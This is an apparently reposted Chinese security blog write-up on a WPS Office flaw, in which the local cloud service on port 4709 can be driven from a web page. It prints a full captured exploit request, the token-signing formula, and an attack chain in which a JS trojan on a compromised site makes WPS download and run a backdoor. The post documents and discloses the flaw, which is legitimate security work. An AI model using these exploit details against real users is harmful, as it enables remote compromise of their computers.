声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 |
文章原文:https://gugesay.com/archives/3435
QQ交流群(6324875)已建立,可自行扫码加入↓ ↓ ↓
背景介绍
上个月曾爆出XX黑客使用 WPS 0day攻击的消息,该漏洞主要涉及wpscloudsvr.exe(即WPS的云服务),当WPS运行时,会建立一个端口为4709的API接口,而该接口可以被滥用,近期该漏洞(实为1day,并非0day)利用细节被捕获并在GitHub上披露。
漏洞细节
WPS Office的wpscloudsvr.exe服务启动时会监听127.0.0.1:4709端口,
但直接访问是无法正常访问的,需要使用域名访问,如:http://localhost.wbridge.wps.cn:4709
捕获到的POST请求内容:
POST /command/invoke HTTP/1.1
Host: localhost.wbridge.wps.cn:4709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 732
Origin: https://docs.wps.cn
Referer: https://docs.wps.cn/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-site
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua: "Google Chrome";v="114", "Chromium";v="114", "Not=A?Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Te: trailers
Connection: close
app_id=kdocs&cmd=ksoqing%3A%2F%2Ftype%3Dksolaunch%26cmd%3DcGx1Z2luOi8vcGFnZUNsb3VkRG9jcz91cmw9aHR0cHM6Ly9haXJzaGVldC1jb21tdW5pdHkud3BzLmNuLw%3d%3d%26token%3D7b542dc31594d4f443dfc073fcb8abd3&ks_local_token=2BwJYEBTwY2ueCNrylNVQhMGt8QMNR3A&nonce_str=AbQ5fb66Q23E2yG3dbSM2TQ8M4HmD7i8&t=1695719826922&sign=C16B6005259121B111BF72787186D057FF191D04D2374F47E064F7A541B3601A
上面的请求包执行后,会触发wps的api接口,打开wps官网,攻击者的Payloads将存储在网站中,加载后,后门会被下载到指定目录并运行。
通过逆向分析,可以发现cmd是base64编码的WPS官网域名,因为WPS限制了部分白名单中的域名只能用内置 浏览器打开,不在白名单中的可以用用户默认打开browser.whitelisted 域名如:.wps.cn .wps.com .wpscdn.cn .kdocs.cn ….
Sign Token:
md5(cmd + '_qingLaunchKey_')
利用方式:
黑客向目标网站发起攻击并植入JS木马后门
用户访问网站时触发JS木马,导致黑客攻击用户的本地WPS Office
如果用户的WPS开启了4709端口监听,将实施攻击,从而在用户系统中安装后门
Github原文:https://github.com/George-boop-svg/Chinese-hackers-use-WPS-to-attack?tab=readme-ov-file
加入星球,随时交流:
(前50位成员):99元/年
(后续会员统一定价):128元/年
感谢阅读,如果觉得还不错的话,欢迎分享给更多喜爱的朋友~
====正文结束====